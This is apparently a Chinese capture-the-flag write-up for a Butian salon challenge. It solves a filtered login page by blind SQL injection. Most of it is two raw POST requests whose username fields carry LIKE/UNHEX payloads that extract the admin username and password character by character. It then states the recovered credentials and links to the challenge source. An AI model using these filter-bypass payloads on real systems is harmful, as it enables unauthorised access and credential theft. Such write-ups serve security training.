补天沙龙CTF SQL注入 HTML源码中有提示,需要SQL注入出账号密码。
存在关键词过滤,无法直接使用sqlmap跑。
使用如下payload逐位注入出用户名与密码。
POST /login.php HTTP/1.1 Host : 81.69.247.193Content-Length : 71Cache-Control : max-age=0Origin : http://81.69.247.193DNT : 1Upgrade-Insecure-Requests : 1Content-Type : application/x-www-form-urlencodedUser-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36Accept : text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Referer : http://81.69.247.193/login.phpAccept-Encoding : gzip, deflateAccept-Language : zh-CN,zh;q=0.9Connection : close username=a'+or+username+like+UNHEX('73797361646d6925')+or+'0&password=1
POST /login.php HTTP/1.1 Host : 81.69.247.193Content-Length : 77Cache-Control : max-age=0Origin : http://81.69.247.193DNT : 1Upgrade-Insecure-Requests : 1Content-Type : application/x-www-form-urlencodedUser-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36Accept : text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Referer : http://81.69.247.193/login.phpAccept-Encoding : gzip, deflateAccept-Language : zh-CN,zh;q=0.9Connection : close username=a'+or+password+like+UNHEX('62757469616e4030383225')+or+'0&password=1
获得账号为sysadmin,密码为butian@0827
文件上传 https://forum.butian.net/share/2399
源码 https://static-1256168285.cos.ap-chengdu.myqcloud.com/butian_ctf_0827.zip